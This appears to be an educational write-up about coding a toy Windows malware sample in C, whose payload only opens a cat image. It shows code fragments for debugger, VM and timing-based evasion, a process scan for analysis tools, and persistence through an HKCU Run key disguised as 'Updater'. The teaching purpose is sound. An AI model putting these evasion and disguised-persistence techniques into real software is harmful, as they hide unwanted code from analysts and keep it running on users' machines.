Coding a Malware in C

About

This is a simple malware written in C to further extend the understanding of how malware works at its core when calling APIs, employing evasive techniques, and editing the registry for persistence. Although this malware is not necessarily harmful, it uses conceptual techniques that real malware uses, but at a different level of complexity.

Malware Coding and explanation

Core Functions and Techniques

---

Evasive Techniques

Checking for the system’s uptime by the GetTickCount¹ call. This takes into account the time the machine has been running, and that is relevant to detect if it is running in a Lab VM. In this case, if the Machine has been running for less than 10minutes it flags it as suspicious. The value it returns is in ms, where 600000ms equals 10 minutes.

if(GetTickCount() < 600000) return 1;

The program also checks if there is any debugger by calling the IsDebuggerPresent² to see if there is any flagging of this file being debugged, and if so, it returns a value of 1.value of 1.

if(IsDebuggerPresent()) return 1;

It also checks if theres any slowing of the process by taking the uptime of the system and the moment thorugh using the GetTickCount again, pausing the current thread, and seeing if there is any delay in between times, which could indicate that the program is being tampered with or observed. In this case, if it takes more than 40ms, it flags it as suspicious and gives it a value of 1, since it should only take 10-20ms normally.

t1 = GetTickCount();
Sleep(10);
t2 = GetTickCount();
if(t2 - t1 > 40) return 1;

Through the use of the API call of CreateToolhelp32Snapshot³ , which takes a snapshot of all the current processes and goes through them filtering for processes that contain dbg or other suspicious processes.

CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
Process32First() / Process32Next()

Persistence and Sustainability

Very common technique, as seen in MITRE ATT&CK T1547.001, it modifies the registry so the malware runs every time the system boots, and in this case, modifying the registry at HKEY_CURRENT_USER does not require admin privileges, and it is also modified to look like a harmless “Updater.”

RegOpenKeyExA(HKEY_CURRENT_USER, 
"Software\\Microsoft\\Windows\\CurrentVersion\\Run", ...)
RegSetValueExA(hk, "Updater", 0, REG_SZ, ...)

Persistence and Sustainability

Executes and opens the image that is embedded in the exe, and runs every time on boot.

GetTempPathA(MAX_PATH, tmp);
CreateFileA() / WriteFile()
ShellExecuteA(NULL, "open", path, ...)

---

Executing the Malware!

After running the Malware in the Isolated VM after just booting the machine, it did not take any action following the condition that the machine just booted and flagging it as a VM, after waiting and running it again after the time passed; the cat image popped up and also wrote in the registry and it pops up every time the machine runs.

---

Conclusion

This malware implements real-world techniques used by Windows threats: sandbox and debugger evasion, process-based analysis detection, registry persistence, and embedded payload execution. The logic flow is deliberate, analysis checks all behavior, persistence is established early, and the payload is dropped and executed silently. Although simple, the sample behaves like genuine commodity malware. It avoids monitored environments, survives reboots through HKCU\Run, and executes a secondary payload from disk. These patterns are consistent with what is seen in real malware families, just without encryption, obfuscation, or network communication.